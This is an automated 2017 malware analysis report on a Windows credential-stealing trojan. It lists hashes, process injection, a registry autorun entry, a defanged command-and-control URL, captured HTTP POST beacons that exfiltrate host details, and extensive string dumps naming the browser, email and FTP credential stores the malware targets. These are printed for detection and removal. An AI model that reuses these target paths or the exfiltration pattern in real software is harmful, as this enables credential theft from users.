ML.Attribute.HighConfidence_0547cd6c91

by malwarelabrobot on April 19th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), ML.Attribute.HighConfidence (Symantec), Trojan.Inject (Ikarus), Win32:Malware-gen (Avast)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0547cd6c917a10b16f7eeaa46b5958d9
SHA1: 38d4343e634a804edd08aa168245b75cc500d583
SHA256: 059e6572291516436e190b0fe23c9951fe0cecc3f8da0e463aa8e8f8c06d260b
SSDeep: 6144:mUByrr oyzro4UDrvXvDimwdg/YgziIVJr4r4cazhQ fYqqQ6 euzfkVeyiCfD4:mUBgyoyvfO PYnziI/Y45TYqqQAQbHoE
Size: 419176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-08-14 22:15:54
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The ML creates the following process(es):

Window.exe:3624
%original file name%.exe:3596

The ML injects its code into the following process(es):

Window.exe:2308

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Window.exe:2308 makes changes in the file system.
The ML creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (616 bytes)

The ML deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (0 bytes)

The process %original file name%.exe:3596 makes changes in the file system.
The ML creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Order_Descriptions.doc (36 bytes)

The ML deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\__tmp_rar_sfx_access_check_1473382 (0 bytes)

Registry activity

The process Window.exe:3624 makes changes in the system registry.
The ML creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the ML adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"l0k0n0101010101010101010l0k0n" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe"

The process %original file name%.exe:3596 makes changes in the system registry.
The ML creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The ML deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
6864e41084347763b45087b1d1ecb997 c:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 135031 135168 4.58976 792daf1ebbf0f019d3486580dfe317d1
.rdata 139264 36820 36864 3.55965 9d62ca750ab21611bd69d7a3e5333d52
.data 176128 185200 3072 1.91669 ab0f244b352be8b4c7ffac28b0999542
.gfids 364544 252 512 1.49939 7af9f45b4511d68a2575fde63622b162
.rsrc 368640 89920 90112 4.71566 31ff23bedcd31dbf4e05d231582b63c5
.reloc 458752 9044 9216 4.64072 f61d7f0f6bcc5a445f5126dff171e1c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://topsey5000.bplaced.net/loky/fre.php 144.76.167.70
teredo.ipv6.microsoft.com 157.56.120.207
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 177
Connection: close

..(.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|.......................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.
HTTP/1.1 200 OK
Date: Tue, 18 Apr 2017 07:22:08 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
........................File not found...


POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 204
Connection: close

..'.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|.................... ................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.....5q9T5....
HTTP/1.1 404 Not Found
Date: Tue, 18 Apr 2017 07:22:08 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
File not found...


POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 204
Connection: close

..'.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|...................k.................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.....eKTty....
HTTP/1.1 404 Not Found
Date: Tue, 18 Apr 2017 07:22:07 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
File not found...


The ML connects to the servers at the folowing location(s):

rundll32.exe_3604:

.text
`.data
.rsrc
@.reloc
KERNEL32.dll
USER32.dll
msvcrt.dll
imagehlp.dll
ntdll.dll
?.ulf
.ue9]
ole32.dll
_amsg_exit
_wcmdln
rundll32.pdb
name="Microsoft.Windows.Shell.rundll32"
version="5.1.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
name="Microsoft.Windows.Shell.rundll32"
version="5.1.0.0"
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\UNC\
rundll32.exe
Windows host process (Rundll32)
6.1.7600.16385 (win7_rtm.090713-1255)
RUNDLL32.EXE
Windows
Operating System
6.1.7600.16385

window.exe_2308:

.text
`.rdata
@.data
j.Xf9
QSSSSSSh
uiSShx
u.hpSA
u.hTSA
SShE3
Xjf_j%f
HSVWj%Xjsf
DSVWj%Xjsf
0SVWj%Xjs[j\Zj._jpYju^jrf
4SVWj%Xjsf
PSVWj%Xjsf
SVWj%Xjsf
Yj%Xjsf
u.hpiA
SVWj*Xj.Zjpf
XjgYj%f
j%Xjsf
TSVWj%Xjs^j\[jMf
8VWj%Xjs_j\^jTf
j%XjsYj\f
(j%Xjsf
Xf
Xf
Sj%XjsYj\f
j.Xjzf
t|SSh
SShbA
Xj3[j2_j.ZjdYjl^f
SQLite format 3
hXXp://
hXXps://
password_value
origin_url
logins
SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
encryptedPassword
PK11_GetInternalKeySlot
PK11_CheckUserPassword
sqlite3_finalize
sqlite3_step
sqlite3_close
sqlite3_column_text
sqlite3_open16
sqlite3_prepare_v2
sqlite3_prepare
X!2$6*9(SKiasb !v<.qF58_qwe~QsRTYvdeTYb
Port
Password
MAC=XXXINSTALL=XXk
Fuckav.ru
More information: hXXp://VVV.ibsensoftware.com/
WS2_32.dll
GetProcessHeap
KERNEL32.dll
ole32.dll
OLEAUT32.dll
hXXp://topsey5000.bplaced.net/loky/fre.php
Windows
%s\%s
%s\%s\%s%s
%s\%s%s
ntdll.dll
%s\%s\User Data\Default\Login Data
%s\%s\User Data\Default\Web Data
%s%s\Login Data
%s%s\Default\Login Data
MapleStudio\ChromePlus
Google\Chrome
Nichrome
Google\Chrome SxS
\Opera\Opera Next\data
\Opera Software\Opera Stable
vaultcli.dll
%sX
Software\Microsoft\Internet Explorer\TypedURLs
%s\logins.json
%s\prefs.js
%s\signons.sqlite
signons.txt
signons2.txt
signons3.txt
%s\Mozilla\Firefox\profiles.ini
%s\Mozilla\Firefox\Profiles\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\Profiles\%s
%s\Flock\Browser\profiles.ini
%s\Flock\Browser\Profiles\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\Profiles\%s
%s\K-Meleon\profiles.ini
%s\K-Meleon\%s
%s\Comodo\IceDragon\profiles.ini
%s\Comodo\IceDragon\Profiles\%s
%s\NETGATE Technologies\BlackHawk\profiles.ini
%s\NETGATE Technologies\BlackHawk\Profiles\%s
%s\Postbox\profiles.ini
%s\Postbox\Profiles\%s
%s\8pecxstudios\Cyberfox\profiles.ini
%s\8pecxstudios\Cyberfox\Profiles\%s
%s\Moonchild Productions\Pale Moon\profiles.ini
%s\Moonchild Productions\Pale Moon\Profiles\%s
%s\FossaMail\profiles.ini
%s\FossaMail\Profiles\%s
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
%s\nss3.dll
sqlite3.dll
mozsqlite3.dll
nss3.dll
SOFTWARE\Mozilla\Mozilla Firefox
%s\%s\Main
PathToExe
SOFTWARE\Mozilla\Mozilla Thunderbird
SOFTWARE\Mozilla\FossaMail
SOFTWARE\Mozilla\Flock
%s\NETGATE\Black Hawk
SOFTWARE\Mozilla\Pale Moon
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
SOFTWARE\mozilla.org\SeaMonkey
%s\Mozilla\Profiles
SOFTWARE\Mozilla\SeaMonkey
SOFTWARE\Mozilla\Waterfox
firefox.exe
kernel32.dll
sCrypt32.dll
Shlwapi.dll
%s\Opera
wand.dat
bform_password_control
Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
%s\QupZilla\profiles\default\browsedata.db
%s\Apple Computer\Preferences\keychain.plist
%s\Apple Application Support\plutil.exe
-convert xml1 -s -o %s "%s"
%s\Data\AccCfg\Accounts.tdat
%s\Storage
Account.rec0
%s\Foxmail\mail
*.stg
%SYSTEMDRIVE%
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
Passwd
POP3Port
SMTP Email Address
SMTP Server
SMTP User Name
SMTP User
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\32BitFtp.TMP
%s\32BitFtp.ini
%s\Estsoft\ALFTP\ESTdb2.dat
%s\site.xml
%s\BitKinex\bitkinex.ds
*.tlp
*.bscp
Software\Bitvise\BvSshClient
%s\BlazeFtp\site.dat
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
%s\Cyberduck
user.config
%s\iterate_GmbH
%s\EasyFTP\data
%s\ExpanDrive
*favorites.js
drives.js
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
%s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
%s\FileZilla\Filezilla.xml
%s\FileZilla\filezilla.xml
%s\FileZilla\recentservers.xml
%s\FileZilla\sitemanager.xml
%s\FlashFXP
*Sites.dat
*quick.dat
FtpServer
FtpUserName
FtpPassword
_FtpPassword
%s\FreshWebmaster\FreshFTP\FtpSites.SMF
%s\FTPBox\profiles.conf
%s\FTPGetter\Profile\servers.xml
%s\FTPGetter\servers.xml
%s\FTPInfo\ServerList.xml
%s\FTPInfo\ServerList.cfg
%s\FTP Navigator\Ftplist.txt
%s\FTP Now\sites.xml
%s\FTPShell\ftpshell.fsi
%s\.config\fullsync\profiles.xml
%s\DeluxeFTP\sites.xml
%s\GoFTP\settings\Connections.txt
JaSFtp
AbleFTP
%s\%s%i\encPwd.jsd
%s\%s%i\data\settings\sshProfiles-j.jsd
%s\%s%i\data\settings\ftpProfiles-j.jsd
Software\LinasFTP\Site Manager
%s\oZone3D\MyFTP\myPTF.ini
%s\NetDrive\NDSites.ini
%s\NetDrive2\drives.dat
%s\Fastream NETFile\My FTP Links
%s\NexusFile\userdata\ftpsite.ini
%s\NexusFile\ftpsite.ini
%s\INSoftware\NovaFTP\NovaFTP.db
%s\Notepad  \plugins\config\NppFTP\NppFTP.xml
%s\Odin Secure FTP Expert\QFDefault.QFQ
%s\Odin Secure FTP Expert\SiteInfo.QFP
PublicKeyFile
PortNumber
Software\9bis.com\KiTTY\Sessions
%s_dec
lsasrv.dll
lsass.exe
%s\Microsoft\Credentials
%s\Sessions
*.ini
%s\SftpNetDrive
*.cfg
%s\Sherrod Computers\sherrod FTP\favorites
#document.favoriteManager*
%s\SmartFTP
{*.xml
%s\Staff-FTP\sites.ini
%s\Steed\bookmarks.txt
%s\SuperPutty
sPTF://
PTF://
ftps://
%s\Syncovery
Syncovery.ini
%s\wcx_PTF.ini
%s\GHISLER\wcx_PTF.ini
FtpIniName
%s\UltraFXP\sites.xml
%s\WinFtp Client\Favorites.dat
%s\WS_FTP\WS_FTP.INI
%s\WS_FTP.INI
%s\Ipswitch
ws_PTF.ini
%s\NetSarang\Xftp\Sessions
%s\%s\%s.exe
%s\%s.%s
C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Wireshark

window.exe_2308_rwx_00400000_000A2000:

.text
`.rdata
@.data
j.Xf9
QSSSSSSh
uiSShx
u.hpSA
u.hTSA
SShE3
Xjf_j%f
HSVWj%Xjsf
DSVWj%Xjsf
0SVWj%Xjs[j\Zj._jpYju^jrf
4SVWj%Xjsf
PSVWj%Xjsf
SVWj%Xjsf
Yj%Xjsf
u.hpiA
SVWj*Xj.Zjpf
XjgYj%f
j%Xjsf
TSVWj%Xjs^j\[jMf
8VWj%Xjs_j\^jTf
j%XjsYj\f
(j%Xjsf
Xf
Xf
Sj%XjsYj\f
j.Xjzf
t|SSh
SShbA
Xj3[j2_j.ZjdYjl^f
SQLite format 3
hXXp://
hXXps://
password_value
origin_url
logins
SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
encryptedPassword
PK11_GetInternalKeySlot
PK11_CheckUserPassword
sqlite3_finalize
sqlite3_step
sqlite3_close
sqlite3_column_text
sqlite3_open16
sqlite3_prepare_v2
sqlite3_prepare
X!2$6*9(SKiasb !v<.qF58_qwe~QsRTYvdeTYb
Port
Password
MAC=XXXINSTALL=XXk
Fuckav.ru
More information: hXXp://VVV.ibsensoftware.com/
WS2_32.dll
GetProcessHeap
KERNEL32.dll
ole32.dll
OLEAUT32.dll
hXXp://topsey5000.bplaced.net/loky/fre.php
Windows
%s\%s
%s\%s\%s%s
%s\%s%s
ntdll.dll
%s\%s\User Data\Default\Login Data
%s\%s\User Data\Default\Web Data
%s%s\Login Data
%s%s\Default\Login Data
MapleStudio\ChromePlus
Google\Chrome
Nichrome
Google\Chrome SxS
\Opera\Opera Next\data
\Opera Software\Opera Stable
vaultcli.dll
%sX
Software\Microsoft\Internet Explorer\TypedURLs
%s\logins.json
%s\prefs.js
%s\signons.sqlite
signons.txt
signons2.txt
signons3.txt
%s\Mozilla\Firefox\profiles.ini
%s\Mozilla\Firefox\Profiles\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\Profiles\%s
%s\Flock\Browser\profiles.ini
%s\Flock\Browser\Profiles\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\Profiles\%s
%s\K-Meleon\profiles.ini
%s\K-Meleon\%s
%s\Comodo\IceDragon\profiles.ini
%s\Comodo\IceDragon\Profiles\%s
%s\NETGATE Technologies\BlackHawk\profiles.ini
%s\NETGATE Technologies\BlackHawk\Profiles\%s
%s\Postbox\profiles.ini
%s\Postbox\Profiles\%s
%s\8pecxstudios\Cyberfox\profiles.ini
%s\8pecxstudios\Cyberfox\Profiles\%s
%s\Moonchild Productions\Pale Moon\profiles.ini
%s\Moonchild Productions\Pale Moon\Profiles\%s
%s\FossaMail\profiles.ini
%s\FossaMail\Profiles\%s
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
%s\nss3.dll
sqlite3.dll
mozsqlite3.dll
nss3.dll
SOFTWARE\Mozilla\Mozilla Firefox
%s\%s\Main
PathToExe
SOFTWARE\Mozilla\Mozilla Thunderbird
SOFTWARE\Mozilla\FossaMail
SOFTWARE\Mozilla\Flock
%s\NETGATE\Black Hawk
SOFTWARE\Mozilla\Pale Moon
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
SOFTWARE\mozilla.org\SeaMonkey
%s\Mozilla\Profiles
SOFTWARE\Mozilla\SeaMonkey
SOFTWARE\Mozilla\Waterfox
firefox.exe
kernel32.dll
sCrypt32.dll
Shlwapi.dll
%s\Opera
wand.dat
bform_password_control
Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
%s\QupZilla\profiles\default\browsedata.db
%s\Apple Computer\Preferences\keychain.plist
%s\Apple Application Support\plutil.exe
-convert xml1 -s -o %s "%s"
%s\Data\AccCfg\Accounts.tdat
%s\Storage
Account.rec0
%s\Foxmail\mail
*.stg
%SYSTEMDRIVE%
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
Passwd
POP3Port
SMTP Email Address
SMTP Server
SMTP User Name
SMTP User
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\32BitFtp.TMP
%s\32BitFtp.ini
%s\Estsoft\ALFTP\ESTdb2.dat
%s\site.xml
%s\BitKinex\bitkinex.ds
*.tlp
*.bscp
Software\Bitvise\BvSshClient
%s\BlazeFtp\site.dat
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
%s\Cyberduck
user.config
%s\iterate_GmbH
%s\EasyFTP\data
%s\ExpanDrive
*favorites.js
drives.js
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
%s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
%s\FileZilla\Filezilla.xml
%s\FileZilla\filezilla.xml
%s\FileZilla\recentservers.xml
%s\FileZilla\sitemanager.xml
%s\FlashFXP
*Sites.dat
*quick.dat
FtpServer
FtpUserName
FtpPassword
_FtpPassword
%s\FreshWebmaster\FreshFTP\FtpSites.SMF
%s\FTPBox\profiles.conf
%s\FTPGetter\Profile\servers.xml
%s\FTPGetter\servers.xml
%s\FTPInfo\ServerList.xml
%s\FTPInfo\ServerList.cfg
%s\FTP Navigator\Ftplist.txt
%s\FTP Now\sites.xml
%s\FTPShell\ftpshell.fsi
%s\.config\fullsync\profiles.xml
%s\DeluxeFTP\sites.xml
%s\GoFTP\settings\Connections.txt
JaSFtp
AbleFTP
%s\%s%i\encPwd.jsd
%s\%s%i\data\settings\sshProfiles-j.jsd
%s\%s%i\data\settings\ftpProfiles-j.jsd
Software\LinasFTP\Site Manager
%s\oZone3D\MyFTP\myPTF.ini
%s\NetDrive\NDSites.ini
%s\NetDrive2\drives.dat
%s\Fastream NETFile\My FTP Links
%s\NexusFile\userdata\ftpsite.ini
%s\NexusFile\ftpsite.ini
%s\INSoftware\NovaFTP\NovaFTP.db
%s\Notepad  \plugins\config\NppFTP\NppFTP.xml
%s\Odin Secure FTP Expert\QFDefault.QFQ
%s\Odin Secure FTP Expert\SiteInfo.QFP
PublicKeyFile
PortNumber
Software\9bis.com\KiTTY\Sessions
%s_dec
lsasrv.dll
lsass.exe
%s\Microsoft\Credentials
%s\Sessions
*.ini
%s\SftpNetDrive
*.cfg
%s\Sherrod Computers\sherrod FTP\favorites
#document.favoriteManager*
%s\SmartFTP
{*.xml
%s\Staff-FTP\sites.ini
%s\Steed\bookmarks.txt
%s\SuperPutty
sPTF://
PTF://
ftps://
%s\Syncovery
Syncovery.ini
%s\wcx_PTF.ini
%s\GHISLER\wcx_PTF.ini
FtpIniName
%s\UltraFXP\sites.xml
%s\WinFtp Client\Favorites.dat
%s\WS_FTP\WS_FTP.INI
%s\WS_FTP.INI
%s\Ipswitch
ws_PTF.ini
%s\NetSarang\Xftp\Sessions
%s\%s\%s.exe
%s\%s.%s
C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Wireshark


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Window.exe:3624
    %original file name%.exe:3596

  2. Delete the original ML file.
  3. Delete or disinfect the following files created/modified by the ML:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Order_Descriptions.doc (36 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "l0k0n0101010101010101010l0k0n" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now